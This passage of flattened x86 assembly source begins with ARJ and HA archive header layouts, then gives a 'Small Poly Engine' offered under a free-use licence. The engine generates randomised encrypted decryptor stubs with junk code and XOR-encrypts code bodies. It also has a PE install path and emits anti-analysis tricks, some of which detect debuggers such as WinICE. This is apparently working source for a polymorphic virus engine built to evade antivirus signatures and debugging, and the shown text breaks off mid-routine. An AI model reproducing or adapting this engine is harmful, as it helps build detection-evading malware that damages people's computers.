ARCHIVER VERSION NUMBER ARJ_MIN_VER DB ? ;01 MINIMUM ARCHIVER VERSION TO EXTRACT ARJ_HOST_OS DB ? 
;00 HOST OS (0 = MSDOS) ARJ_FLAGS DB ? ;10 ARJ FLAGS ;(0x01 = GARBLED_FLAG) INDICATES PASSWORDED FILE ;(0x02 = RESERVED) ;(0x04 = VOLUME_FLAG) INDICATES CONTINUED FILE TO NEXT VOLUME ;(0x08 = EXTFILE_FLAG) INDICATES FILE STARTING POSITION FIELD ;(0x10 = PATHSYM_FLAG) INDICATES PATH TRANSLATED ARJ_COMPRESS_METHOD DB ? ;00 METHOD (0 = STORED) ARJ_FILE_TYPE DB ? ;00 0=BINARY, 1=TEXT ARJ_RESERVED DB ? ;(??? LAST BYTE OF TIME STAMP OF ARJ FILE) ARJ_FILE_TIME DW ? ;DATE TIME STAMP MODIFIED ARJ_FILE_DATE DW ? ARJ_COMPRESSED_SIZE DD ? ;COMPRESSED SIZE ARJ_ORIGINAL_SIZE DD ? ;ORIGINAL SIZE ARJ_CRC32 DD ? ;ORIGINAL FILE'S CRC ARJ_ENTRYNAME_POS DW ? ;0 ENTRYNAME POSITION IN FILENAME ARJ_FILE_ACCESS_MODE DW ? ;0 FILE ACCESS MODE ARJ_HOST_DATA DW ? ;0 HOST DATA (CURRENTLY NOT USED) ARJ_FNAME LABEL BYTE ; ? EXTRA DATA (IF SET EXTFILE_FLAG) ; 4 BYTES FOR EXTENDED FILE POSITION ; ? FILENAME (NULL-TERMINATED) ; ? COMMENT (NULL-TERMINATED) ; 4 BASIC HEADER CRC ; 2 1ST EXTENDED HEADER SIZE (0 IF NONE) = 0 ; ? 1ST EXTENDED HEADER ; 4 1ST EXTENDED HEADER'S CRC (NOT PRESENT IF 0 EXTENDED HEADER SIZE) ; ... ; ? COMPRESSED FILE ENDS ;HA ARCHIVE HA_SIGN = 4148H HA_STORED = 20H ;HAFILE ;0000 HA ;0002 CNT ;0004 HDR1 ;. FILE1 ;. HDR2 ;. FILE2 HA_MAIN_HEADER STRUC HA_M_SIGN DW ? ;0 HA = IDENTIFIER FOR HA ARCHIVE HA_M_FILE_CNT DW ? ;2 NUMBER OF FILES IN ARCHIVE ENDS HA_FILE_HEADER STRUC HA_VER_METHOD DB ? ;0 VER<<4 | TYPE TYPE 0-CPY,1-ASC,2-HSC ; 0xE-DIR 0xF-SPECIAL (20H FOR CPY) HA_COMPRESS_SIZE DD ? ;1 HA_ORIGINAL_SIZE DD ? ;5 HA_CRC32 DD ? ;9 HA_FILE_TIME DW ? ;D HA_FILE_DATE DW ? ;F HA_PATH DB ? 
;11 (ZERO IF ISN'T PRESENT) NOTE: ALL ;DIRPATHS SEPARATED BY 0xFF CODE ENDS ;12 ;+N 0 ;+1 NAME ;+N 0 ;+1 LENGTH OF MACHINE SPECIFIC INFORMATION (02H) ;+1 MACHINE SPECIFIC INFORMATION: ; +0 SYSTEM TYPE (0-DOS,1-LINUX,[DEFAULT=1]) ; +1 FILE ATTRIBUTES (BYTE) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[VBA.INC]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SPE.ASI]ÄÄÄ COMMENT / (C) VBA Ltd. ALL RIGHTS RESERVED. E-mail: support@vba.com.by THIS PROGRAM IS FREE FOR COMMERCIAL AND NON-COMMERCIAL USE. REDISTRIBUTION AND USE IN SOURCE AND BINARY FORMS, WITH OR WITHOUT MODIFICATION, ARE PERMITTED. THIS SOFTWARE IS PROVIDED BY VBA LTD. ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
/ ;-------------------------------------- ;SMALL POLY ENGINE (16/32 PART) ;ENTRY: ECX=0,DS=ES=16BIT/BASE=START,SS=FLAT32 ;EXIT: DI=LENGTH DECRYPTOR+CODE+SOME SHIT(FULL LENGTH) - FOR SPE16(ENCRYPT_BUFF) ; =LENGTH DECRYPTOR - FOR SPE32(SPE32_BUFF - DECRYPTOR) OFF_SPE = $-START SPE PROC FAR DWORD_REG ENUM _EAX,_ECX,_EDX,_EBX,_ESP,_EBP,_ESI,_EDI WORD_REG ENUM _AX,_CX,_DX,_BX,_SP,_BP,_SI,_DI BYTE_REG ENUM _AL,_CL,_DL,_BL,_AH,_CH,_DH,_BH SEGM_REG ENUM _ES,_CS,_SS,_DS FREE_SREG = _SS SHL 3 FREE_WREG = 1 SHL _SP ADD_R = 00B ADD_RB = 01B ADD_RD = 10B ADD_RIMM = 11B UNUSED_REG = 0FFH MOV DX,OFF_GET_RAND_2 MOV BX,ADDRESS_BUFF MOV [BX-2],BX CALL GET_RAND_WORD MOV 2 PTR DS:FIRST_MASK,AX XOR BP,BP XOR DI,DI CMP 1 PTR [DI],0E9H JE SPE32 PUSH AX CALL GET_RAND_WORD MOV 2 PTR DS:SECOND_MASK,AX PUSH AX XCHG AX,DI ;AX=0 MOV DI,SEEK_TABLE MOV CL,LEN_DECRYPTOR MOV [DI-2],CX ;SMALL 2 PTR DS:LEN_SEEK MOV SMALL 1 PTR DS:SHIT_FLAG,AL PUSH CX FILL_SEEK: STOSB INC AX LOOP FILL_SEEK MOV AL,0FFH ;END SEEK_TABLE MARKER STOSB POP CX MOV SI,DECRYPTOR REP MOVSB MOV CH,LEN_MAIN_BUFF SHR 9 PUSH DI FILL_BUFF: CALL GET_RAND_WORD STOSW LOOP FILL_BUFF POP DI CALL GET_TRICK CALL GET_RAND_8 ADD AL,LEN_DECRYPTOR XCHG AX,CX ENCODE_SHIT: PUSH CX CALL ENCRYPT_ITER NO_GEN_ENCRYPT: CALL GET_TRICK POP CX LOOP ENCODE_SHIT MOV SI,ADDRESS_BUFF MOV CL,LEN_DECRYPTOR NEXT_CORRECT: LODSW XCHG AX,BX MOV AX,DI SUB AX,SMALL ENCRYPT_BUFF-100H ADD [BX],AX LOOP NEXT_CORRECT DONT_CORRECT: MOV SI,TEMP_DECRYPTOR MOV CL,LEN_DECRYPTOR REP MOVSB ;MOVE AND ENCRYPT CODE XOR SI,SI ;OFFSET START-100H MOV CX,OUR_LEN PUSH DI CX REP MOVSB POP CX DI BX AX ENCRYPT_CODE: XOR [DI],AX SUB AX,BX INC DI LOOP ENCRYPT_CODE CALL GET_RAND_WORD MOV CL,AL INC CX GEN_END_SHIT: CALL GET_RAND_WORD STOSB LOOP GEN_END_SHIT SUB DI,SMALL ENCRYPT_BUFF DB 66H RET ENDP ;====================================== SPE32: CALL DX MOV SMALL 1 PTR DS:WORD_MODE,AL MOV 2 PTR [DI+1],PE_INSTALL-5 MOV DI,RESTORE_REGS MOV CL,LEN_FILL_RESTORE MOV AX,9090H PUSH DI REP STOSB 
;FILL NOP MOV DI,LOOP_CR JNE @@ISNOP1 MOV AX,1234H ORG $-2 SHR CX,1 @@ISNOP1: STOSW PUSHF SCASW ;SKIP SHR E/DI POPF MOV AL,2 JNE @@ISNOP2 MOV AL,4 @@ISNOP2: STOSB PUSHF SCASW ;SKIP MOV EBX,[EDI] POPF MOV CL,LEN_FILL_CRYPT MOV AL,90H PUSH DI REP STOSB JE @@ISNOP3 MOV AL,66H @@ISNOP3: STOSB MOV EBP,12345678H OFF_FIXUP = $-START-4 MOV DI,COUNT_REG XCHG AX,CX DEC AX MOV SMALL 2 PTR DS:PUSHED_REGS,AX STOSW ;FILL 7 BYTES STOSW STOSW STOSB MOV 1 PTR [DI-24H],FREE_WREG ;SMALL 1 PTR DS:DIRTY_WREG INC DI MOV SI,INIT_LIST CALL RANDOM_CALL CALL GET_FREE_REG MOV SMALL 1 PTR DS:WORK_REG,BL CALL GEN_PUSH POP BP PUSH DI ;FOR LOOP CALL RANDOM_CALL CALL GET_SHIT CALL CHANGE_WORK_REG_RELO CALL GET_SHIT CALL STORE_WORK_REG_RELO CALL GET_SHIT CALL CHANGE_OFF_REG_RELO ;SI=SMALL 1 PTR DS:DEC_OFF_COUNT MOV SMALL 1 PTR DS:WORD_MODE,0 MOV BL,[SI+2] ;SMALL 1 PTR DS:COUNT_REG AND BL,BL JS CMP_IMM CALL GET_RAND_4 JE CMP_IMM CMP BL,_ECX JNE NO_LOOP CALL GET_RAND_4 XCHG AX,CX MOV AL,0E2H ;LOOP JE SMALL_JI NO_LOOP: MOV AL,1 CALL GEN_DEC ;SI=SMALL 1 PTR DS:DEC_OFF_COUNT DEC AX MOV AL,3 JE NO_SIGNED DEC AX NO_SIGNED: CALL GET_RAND_BYTE JE LET_JNZ DEC AX JNE LET_JA MOV AL,7FH ;JG JMP CALC_JI CMP_IMM: MOV ECX,[SI-4] ;SMALL 4 PTR DS:TOP_ADDRESS MOV BL,[SI+1] ;SMALL 1 PTR DS:OFF_REG AND BL,BL ;_EAX JNE NO_EAX CALL GET_RAND_4 JE NO_EAX MOV AL,3DH ;CMP EAX STOSB STC JMP SAVE_CMP_OFF NO_EAX: MOV AX,0F881H ;CMP OR AH,BL CALL CHECK_SIGN STOSW SAVE_CMP_OFF: XCHG EAX,ECX JNB SIGN_OPCODE STOSD CMP AL,12H ORG $-1 SIGN_OPCODE: STOSB CHOOSE_JI: CALL DX LET_JA: SHL AL,1 LET_JNZ: OR AL,75H ;JNZ CALC_JI: PUSH AX CALL DX XCHG CX,AX POP AX JE SMALL_JI MOV 1 PTR [DI],0FH INC DI ADD AL,10H SMALL_JI: STOSB POP AX SUB AX,DI DEC AX JCXZ IS_SMALL SUB AX,3 CWDE STOSD CMP AL,12H ORG $-1 IS_SMALL: STOSB CALL GET_SHIT CALL GET_RAND_4 MOV AX,0FFC4H MOV SMALL 2 PTR DS:ADDRESS_MODE,AX MOV AL,_ESP JE LET_ESP TRY_NEXT: MOV SI,OFF_REG CALL GET_RAND_4 ADD SI,AX MOV AL,[SI] CMP AL,0FFH JE TRY_NEXT MOV CL,90H ;50H-0C0H PUSH AX CALL 
MOVE_TO POP AX LET_ESP: PUSH AX CALL GET_RAND_3 DEC AX XCHG AX,SI JS GO_RETN MOV CX,0E0FFH ;JMP REG JE JMP_ESP_X MOV CH,0D0H ;CALL REG MOV 2 PTR [SI],PE_INSTALL_POP-5 CALL GET_RAND_WORD MOV SMALL 4 PTR DS:INTRUD_OFF,EAX JMP_ESP_X: POP AX OR CH,AL XCHG AX,CX JMP JMP_ESP GO_RETN: POP AX ADD AL,50H ;PUSH STOSB CALL GET_SHIT CALL DX ADD AL,0C2H STOSB MOV AL,AH JP NO_ZERO_FILL JMP_ESP: STOSW NO_ZERO_FILL: XCHG AX,DI SUB AX,SMALL SPE32_BUFF MOV SMALL 2 PTR DS:ENCRYPTOR_LEN,AX POP DI PUSH AX MOV SI,PUSHED_REGS MOV BX,2 NEXT_REST_REG: MOV AL,8BH ;MOV DREG,[ESP+XXXXXXXX] STOSB MOV AL,[BX+SI] SHL AL,3 OR AL,84H MOV AH,24H STOSW MOVZX EAX,1 PTR [SI] SHL AX,2 ADD EAX,SMALL 4 PTR DS:CURRENT_LEN STOSD INC BX DEC 1 PTR [SI] JNS NEXT_REST_REG POP DI DB 66H RETF ;-------------------------------------- CHK_MODE: CMP SMALL 1 PTR DS:WORD_MODE,0 RETN ;-------------------------------------- CHK_MODE_PRFX: PUSH AX CALL CHK_MODE JE @@NO_WMODE MOV AL,66H ;TURN TO 16BIT REG STOSB @@NO_WMODE: POP AX RETN ;-------------------------------------- CHK_MODE_SZ: CALL CHK_MODE MOV AL,4 JE @@NO_WMODE MOV AL,2 @@NO_WMODE: RETN ;-------------------------------------- ;ENTRY:BL=REG NUMBER GEN_PUSH: PUSH BX SI MOV AL,BL MOV SI,PUSHED_REGS INC 2 PTR [SI] MOV BX,[SI] MOV [BX+SI+2],AL ADD AL,50H ;PUSH STOSB ADD SMALL 2 PTR DS:COUNT_RET,4 POP SI BX RETN ;-------------------------------------- ;ENTRY: SI=FIRST OFFSET,AL=HIGH LIMIT RANDOM_CALL: LODSB CBW MOV CX,AX CALL GET_RAND_BYTE SHL AX,1 XCHG AX,BX MOV AX,[BX+SI] XCHG AX,[SI] MOV [BX+SI],AX RCALL_NEXT: PUSH CX SI CALL GET_SHIT CALL 2 PTR [SI] POP SI CX LODSW LOOP RCALL_NEXT NO_INIT: RETN ;-------------------------------------- CHANGE_WORK_REG = $-START CHANGE_WORK_REG_RELO: MOV BX,MASK_REG MOV AL,UNUSED_REG CMP AL,[BX+3] ;SMALL 1 PTR DS:CHG_WR_FLAG JNE NO_INIT CMP AL,[BX+3+1] ;SMALL 1 PTR DS:SET_WR_FLAG JE NO_INIT INC 1 PTR [BX+3] ;SMALL 1 PTR DS:CHG_WR_FLAG PUSH BX CALL CHANGE_ESP POP BX CALL CHK_MODE JE @@NO_WMODE MOV AL,66H CALL BUILD_CBYTE @@NO_WMODE: 
MOV CL,[BX+1] ;SMALL 1 PTR DS:WORK_REG MOV CH,UNUSED_REG CMP CH,[BX] JE GO_GET_OP32 CALL GET_RAND_4 JNE NO_GET_OP32 GO_GET_OP32: CALL CHK_MODE MOV AL,LEN_OP32_IMM JE GET_OP32 DEC AX ;SKIP BSWAP WITH 66H PREFIX JMP GET_OP32 NO_GET_OP32: MOV SI,OP32_REG_CHG CALL GET_RAND_3 ADD SI,AX MOVSB MOV AL,[SI+LEN_OP32_REG_CHG-1] MOV AH,0D8H CALL BUILD_CRYPT MOV CH,[BX] CALL DX JE NO_XCHG XCHG CL,CH XOR 1 PTR [DI-1],2 NO_XCHG: SHL CL,3 OR CL,CH XCHG AX,CX OR AL,0C0H STOSB RETN ;-------------------------------------- CHANGE_MASK_REG = $-START CALL CHANGE_ESP MOV CL,SMALL 1 PTR DS:MASK_REG AND CL,CL JS OUT_CHG_MASK XOR CH,CH MOV AL,LEN_OP32_IMM GET_OP32: MOV SI,OP32_IMM CALL GET_RAND_BYTE SHL AX,1 XCHG AX,BX JNE NO_BTC MOV AL,0FH CALL BUILD_CBYTE NO_BTC: AND CH,CH JE NO_REVERSE_OP NEG BX MOV AX,[BX+SI-2] CALL BUILD_CRYPT NEG BX STC NO_REVERSE_OP: MOV AX,[BX+SI] JB REVERSE_OP CALL BUILD_CRYPT REVERSE_OP: OR AH,CL CMP AL,90H JNE BINARY_OPCODE MOV AL,AH STOSB RETN BINARY_OPCODE: STOSW CMP AL,0FH JE OUT_CHG_MASK CMP AL,0D1H JAE OUT_CHG_MASK CMP AL,81H PUSHF CALL GET_RAND_WORD POPF JE STOS_DWORD AND AL,1FH BUILD_CBYTE: STOSB BUILD_BYTE: MOV DS:[BP],AL INC BP OUT_CHG_MASK: RETN STOS_DWORD: AND CH,CH JE @@NO_WMODE CALL CHK_MODE JE @@NO_WMODE STOSW JMP BUILD_CRYPT @@NO_WMODE: STOSD CALL BUILD_CRYPT32 JMP JUST_INC ;-------------------------------------- BUILD_CRYPT32: DB 66H BUILD_CRYPT: MOV DS:[BP],AX JUST_INC: INC BP INC BP RETN ;-------------------------------------- MOV_WORK_REG = $-START CALL CHANGE_ESP MOV SI,WORK_REG INC 1 PTR [SI+3] ;SMALL 1 PTR DS:SET_WR_FLAG MOV CL,30H ;-------------------------------------- ;ENTRY: CL=30H (PUSH [][]+XX) OR CL=90H (PUSH DREG) ; 1 PTR [SI]=REG MOVE_TO: MOV BL,[SI] CALL GET_RAND_3 DEC AX JNE NO_MOV MOV AL,8BH ;MOV JMP SAVE_ADDRESS NO_MOV: JNS NO_PUSH CALL CHK_MODE_PRFX AND CL,CL PUSHF JS NO_FF STOSB NO_FF: MOV BL,CL ;PUSH CALL PUSH_CASE POPF JNS IS_FF DEC DI IS_FF: CALL GET_SHIT MOV AL,58H ;POP OR AL,[SI] JMP CHK_MODE_PSTOR NO_PUSH: CALL 
MOV_ZERO32 MOV SI,OP32_REG CALL GET_RAND_3 ADD SI,AX LODSB SAVE_ADDRESS: CALL CHK_MODE_PSTOR SHL BL,3 PUSH_CASE: MOV AX,SMALL 2 PTR DS:ADDRESS_MODE ADD AL,BL MOV EBX,SMALL 4 PTR DS:DELTA_VALUE CMP AH,0FFH JE NO_EXT_OPCODE STOSW TEST AH,0C0H JNE STORE_DWORD CMP AL,12H ORG $-1 NO_EXT_OPCODE: STOSB AND AL,0C0H JP NO_STORE JS STORE_DWORD XCHG AX,BX STOSB NO_STORE: RETN STORE_DWORD: XCHG EAX,EBX GO_STOS_DWORD: STOSD RETN ;-------------------------------------- STORE_WORK_REG = $-START STORE_WORK_REG_RELO: MOV AL,UNUSED_REG MOV SI,DEC_ESP_COUNT CMP AL,[SI-1] ;SMALL 1 PTR DS:SET_WR_FLAG JE NO_STORE_WR CMP AL,[SI-2] ;SMALL 1 PTR DS:CHG_WR_FLAG JE NO_STORE_WR CMP AL,[SI-3] ;SMALL 1 PTR DS:STORE_WR_FLAG JNE NO_STORE_WR INC 1 PTR [SI-3] ;SMALL 1 PTR DS:STORE_WR_FLAG XOR AL,[SI] ;SMALL 1 PTR DS:DEC_ESP_COUNT JS VIA_DEC_ESP CALL CHK_MODE_SZ MOV [SI],AL CALL DX JE VIA_DEC_ESP MOV AL,50H ;PUSH OR AL,[SI-4] ;SMALL 1 PTR DS:WORK_REG CHK_MODE_PSTOR: CALL CHK_MODE_PRFX STOS_BYTE: STOSB NO_STORE_WR: RETN VIA_DEC_ESP: MOV AL,[SI] AND AL,AL JNE DEC_ESP MOV AL,89H ;MOV CALL CHK_MODE_PSTOR CALL GET_RAND_3 ROR AL,2 OR AL,4 MOV AH,[SI-4] ;SMALL 1 PTR DS:WORK_REG SHL AH,3 OR AL,AH MOV AH,24H STOSW TEST AL,0C0H JE NO_STORE_WR MOV AL,0 JNS STOS_BYTE XOR EAX,EAX GO1_STOS_DWORD: JMP GO_STOS_DWORD DEC_ESP: MOV BL,_ESP CALL GEN_DEC JMP VIA_DEC_ESP ;-------------------------------------- ;ENTRY: AL=MAX DEC VALUE, BL=REGISTER ;EXIT : AL=DEC VALUE GEN_DEC: CALL GET_SHIT CALL GET_RAND_BYTE INC AX MOVZX ECX,AX CALL GET_RAND_3 JNE NO_DEC MOV AL,48H ;DEC OR AL,BL STOSB DEC 1 PTR [SI] RETN NO_DEC: SUB [SI],CL CALL DX SHL AL,1 OR AL,81H STOSB PUSHF CALL DX MOV AL,0E8H ;SUB JE IS_SUB MOV AL,0C0H ;ADD NEG ECX IS_SUB: OR AL,BL STOSB XCHG EAX,ECX POPF JP GO1_STOS_DWORD STOSB NO_CHG_OFF: RETN ;-------------------------------------- CHANGE_OFF_REG = $-START CHANGE_OFF_REG_RELO: MOV SI,DEC_OFF_COUNT CMP 1 PTR [SI+7],UNUSED_REG ;SMALL 1 PTR DS:SET_WR_FLAG JE NO_CHG_OFF NEXT_OFF_REG: MOV AL,[SI] AND AL,AL JE 
NO_CHG_OFF MOV BL,[SI+1] ;SMALL 1 PTR DS:OFF_REG CALL GEN_DEC JMP NEXT_OFF_REG ;-------------------------------------- CHANGE_ESP: CALL GET_RAND_4 MOV SI,DEC_ESP_COUNT JNE NO_CHG_ESP CMP AL,[SI-3] ;SMALL 1 PTR DS:STORE_WR_FLAG JE NO_CHG_OFF MOV AL,[SI] AND AL,AL JE NO_CHG_ESP JNS NO_INIT_DESP CALL CHK_MODE_SZ MOV [SI],AL NO_INIT_DESP: MOV BL,_ESP CALL GEN_DEC NO_CHG_ESP: CALL GET_RAND_4 JNE NO_CHG_OFF XOR AL,[SI-1] ;SMALL 1 PTR DS:SET_WR_FLAG JS NO_CHG_OFF MOV SI,DEC_OFF_COUNT MOV AL,[SI] AND AL,AL JE NO_CHG_OFF MOV BL,[SI+1] ;SMALL 1 PTR DS:OFF_REG JMP GEN_DEC ;-------------------------------------- INIT_OFF = $-START MOV SI,ADDRESS_MODE CALL GET_FREE_REG MOV [SI+13H],BL ;SMALL 1 PTR DS:OFF_REG CALL GEN_PUSH CALL GET_SHIT CMP BL,_EBP JNE THREE_MODE CALL DX INC AX JMP EBP_MODE THREE_MODE: CALL GET_RAND_3 EBP_MODE: XOR CX,CX ROR AL,2 MOV [SI],AX XOR CX,CX CALL DX JE SHORT_OPCODE MOV AX,2004H OR AH,BL MOV BH,BL SHL BH,3 PUSH AX CALL GET_RAND_4 DEC AX DEC AX POP AX JE EXT_MODE MOV AH,BL JP SECOND_M_MODE MOV 1 PTR [SI],0 MOV AH,45H JS SECOND_M_MODE CALL CHK_MODE JNE SECOND_M_MODE INC CX MOV AH,85H SECOND_M_MODE: INC CX OR AH,BH OR [SI],AX TEST 2 PTR [SI],0C0C0H JMP GET_RAND_DWORD SHORT_OPCODE: MOV AH,0FFH MOV AL,BL EXT_MODE: OR [SI],AX TEST 1 PTR [SI],(ADD_RIMM SHL 6) GET_RAND_DWORD: JE GO_MOV_WREG CALL GET_RAND_WORD AND AL,NOT 3 TEST 1 PTR [SI],(ADD_RB SHL 6) JE NO_ADD_RB CBW CWDE NO_ADD_RB: SUB EBP,EAX MOV [SI+6],EAX ;SMALL 4 PTR DS:DELTA_VALUE GO_MOV_WREG: XOR EAX,EAX CALL CHK_MODE_SZ SUB EBP,EAX SHR AL,CL MOV [SI+12H],AL ;SMALL 1 PTR DS:DEC_OFF_COUNT SHR EBP,CL MOV [SI+2],EBP ;SMALL 4 PTR DS:OFF_VALUE MOV EAX,SMALL 4 PTR DS:CURRENT_LEN SHR EAX,CL MOV ECX,EBP SUB EBP,EAX MOV [SI+0EH],EBP ;SMALL 4 PTR DS:TOP_ADDRESS JMP MOV_WREG ;-------------------------------------- INIT_COUNT = $-START CALL GET_RAND_4 JE NO_INIT CALL GET_FREE_REG MOV SMALL 1 PTR DS:COUNT_REG,BL CALL GEN_PUSH MOV ECX,SMALL 4 PTR DS:CURRENT_LEN SHR ECX,1 CALL CHK_MODE JNE IS_WM SHR ECX,1 IS_WM: JMP 
MOV_WREG_SH ;-------------------------------------- INIT_MASK = $-START CALL GET_RAND_4 JE NO_INIT CALL GET_FREE_REG MOV SMALL 1 PTR DS:MASK_REG,BL CALL GEN_PUSH CALL GET_RAND_WORD MOV SMALL 4 PTR DS:MASK_VALUE,EAX MOV SMALL 4 PTR DS:MASK_CR,EAX XCHG EAX,ECX MOV_WREG_SH: CALL GET_SHIT JMP MOV_WREG ;====================================== ENCRYPT_ITER: MOV CX,SMALL 2 PTR DS:LEN_SEEK JCXZ NO_CODE_ITER CALL GET_ENCRYPT MOV AX,[SI+SIZE_ENCRYPT_TBL-2] MOV 2 PTR DS:BUFF4ENCRYPT,AX PUSHF MOV BX,ADDRESS_EMPTY MOV SI,[BX] MOV [SI],DI LODSW MOV [BX],SI MOV AL,CL CALL GET_RAND_BYTE ADD AX,SMALL SEEK_TABLE XCHG AX,SI LODSB CBW STOSW ADD AX,SMALL TEMP_DECRYPTOR XCHG AX,BX DEC CX MOV SMALL 2 PTR DS:LEN_SEEK,CX JE IS_LAST_OFF SEEK_MOVE: LODSB MOV [SI-2],AL CMP AL,0FFH JNE SEEK_MOVE IS_LAST_OFF: CALL GET_RAND_WORD POPF JA UNARE_OPCODE STOSB XCHG CX,AX UNARE_OPCODE: BUFF4ENCRYPT = $-START DW 1234H NO_CODE_ITER: RETN ;-------------------------------------- GET_ENCRYPT: MOV AL,SIZE_ENCRYPT_TBL/2 CALL GET_RAND_BYTE SHL AX,1 ADD AX,SMALL ENCRYPT_TBL XCHG AX,SI LODSW STOSW CMP AL,0C0H RETN ;-------------------------------------- GET_TRICK: MOV SMALL 1 PTR DS:DIRTY_WREG,FREE_WREG MOV SMALL 1 PTR DS:DIRTY_SREG,FREE_SREG CALL GET_SHIT MOV SI,TRICK_TBL MOV AL,SIZE_TRICK_TBL ;-------------------------------------- ;SI=TABLE,AL=HIGH LIMIT CALL_RANDOM: CALL GET_RAND_BYTE SHL AX,1 ADD SI,AX JMP 2 PTR [SI] ;-------------------------------------- ;MOV AX,30XXH ;INT 21H ;CMP AL,7/CMP AL,6 ;JAE @@OK/JA @@OK ;RETN ;@@OK: TRICK_1 = $-START MOV CH,30H CALL MOV_AH CALL GEN_INT21 MOV CL,7 JMP CMP_JAX_AL ;-------------------------------------- ;MOV AX,19XXH ;INT 21H ;CMP AL,'Z'-'A'/'Z'-'A'+1 ;JBE @@OK/JB @@OK ;RETN ;@@OK: TRICK_2 = $-START MOV CH,19H MOV AL,'Z'-'A' CMP EAX,12345678H ORG $-4 ;-------------------------------------- ;MOV AX,2AXXH ;INT 21H ;CMP AL,6/7 ;JBE @@OK/JB @@OK ;RETN ;@@OK: TRICK_3 = $-START MOV CH,2AH MOV AL,6 CMP EAX,12345678H ORG $-4 ;-------------------------------------- ;MOV 
AX,54XXH ;INT 21H ;CMP AL,1/2 ;JBE @@OK/JB @@OK ;RETN ;@@OK: TRICK_4 = $-START MOV CH,54H MOV AL,1 PUSH AX CALL MOV_AH JMP CMP_JBX_AL ;-------------------------------------- ;MOV AX,5802H ;INT 21H ;CMP AL,1/2 ;JBE @@OK/JB @@OK ;RETN ;@@OK: TRICK_5 = $-START MOV CX,5802H MOV AL,1 PUSH AX CALL MOV_AX CMP_JBX_AL: CALL GEN_INT21 POP CX MOV BH,76H ;JBE JMP GO_CMP_JXX_AL ;-------------------------------------- ;MOV AX,1600H ;INT 2FH ;CMP AL,4/CMP AL,3 ;JAE @@OK/JA @@OK ;RETN ;@@OK: TRICK_6 = $-START XOR CL,CL CALL MOV_WIN MOV CL,4 CMP_JAX_AL: MOV BH,73H ;JAE GO_CMP_JXX_AL: JMP CMP_JXX_AL ;-------------------------------------- ;MOV AX,1200H ;INT 2FH ;CMP AL,0FFH ;JE @@OK ;RETN ;@@OK: TRICK_7 = $-START MOV CX,1200H MOV AL,0FFH JMP GEN_CODE ;-------------------------------------- ;MOV AX,4300H ;INT 2FH ;CMP AL,80H ;JE @@OK ;RETN ;@@OK: TRICK_8 = $-START MOV CX,4300H MOV AL,80H GEN_CODE: PUSH AX CALL MOV_INT2F CMP_JE_AL = $-START POP CX MOV BX,(74H SHL 8) OR _AL ;JE JMP CHECK_REG ;-------------------------------------- ;MOV AX,160AH ;INT 2FH ;AND AX,AX ;JE @@OK ;RETN ;@@OK: TRICK_9 = $-START MOV CL,0AH COMMON_CODE: CALL MOV_WIN CMP_JE_AX: MOV BX,(74H SHL 8) OR _AX ;JE JMP OR_JXX ;-------------------------------------- ;MOV AX,1687H ;INT 2FH ;AND AX,AX ;JE @@OK ;RETN ;@@OK: ;PUSH CS ;POP ES TRICK_10 = $-START MOV CL,87H CALL COMMON_CODE JMP RESTORE_ES ;-------------------------------------- ;MOV BX,X ;MOV AX,1684H ;INT 2FH ;AND DI,DI ;JE @@OK ;RETN ;@@OK: ;PUSH CS ;POP ES TRICK_14 = $-START MOV CX,BCHECKER_ID JMP GEN_DAPI_EP TRICK_15 = $-START MOV CX,IMMUNER_ID JMP GEN_DAPI_EP TRICK_16 = $-START MOV CX,SIWVID_ID JMP GEN_DAPI_EP TRICK_11 = $-START MOV CX,WINICE_ID GEN_DAPI_EP: MOV BL,_BX CALL MOV_WREG MOV CL,84H CALL MOV_WIN MOV BX,(74H SHL 8) OR _DI ;JE CALL OR_JXX_FREE RESTORE_ES: MOV SMALL 1 PTR DS:DIRTY_SREG,_ES JMP RESTORE_SREG ;-------------------------------------- ;CALL @@OK ;DB $... 
;@@OK: ;POP DX ;MOV AX,900H ;INT 21H TRICK_12 = $-START INC SMALL 1 PTR DS:SHIT_FLAG CALL GET_RAND_3 ADD AL,15 ADD AX,DI PUSH AX SUB AX,SMALL ENCRYPT_BUFF-100H XCHG AX,CX CALL GEN_CALL POP AX DEC SMALL 1 PTR DS:SHIT_FLAG MOV 1 PTR [DI],'$' XCHG AX,DI MOV AL,5AH ;POP DX STOSB MOV BL,_DX CALL USED_WREG MOV CH,9 CALL MOV_AH MOV SMALL 1 PTR DS:DIRTY_SREG,_ES GEN_INT21: MOV BH,21H JMP INT_XX ;-------------------------------------- ;XOR BX,BX ;MOV AX,1683H ;INT 2FH ;AND BX,BX ;JNE @@OK ;RETN ;@@OK: TRICK_13 = $-START MOV BL,_BX CALL MOV_ZERO16 MOV CL,83H CALL MOV_WIN MOV BX,(75H SHL 8) OR _BX ;JNE OR_JXX_FREE: DEC SMALL 1 PTR DS:DIRTY_WREG ;FREE _AX OR_JXX: XOR CX,CX JMP CHECK_REG ;-------------------------------------- ;MOV BX,X ;ENUM {STDIN,STDOUT,STDERR} ;MOV AX,4407H ;INT 21H ;CMP AL,0FFH ;JE @@OK ;RETN ;@@OK: TRICK_17 = $-START CALL GET_RAND_3 XCHG AX,CX MOV BL,_BX CALL MOV_WREG MOV CX,4407H 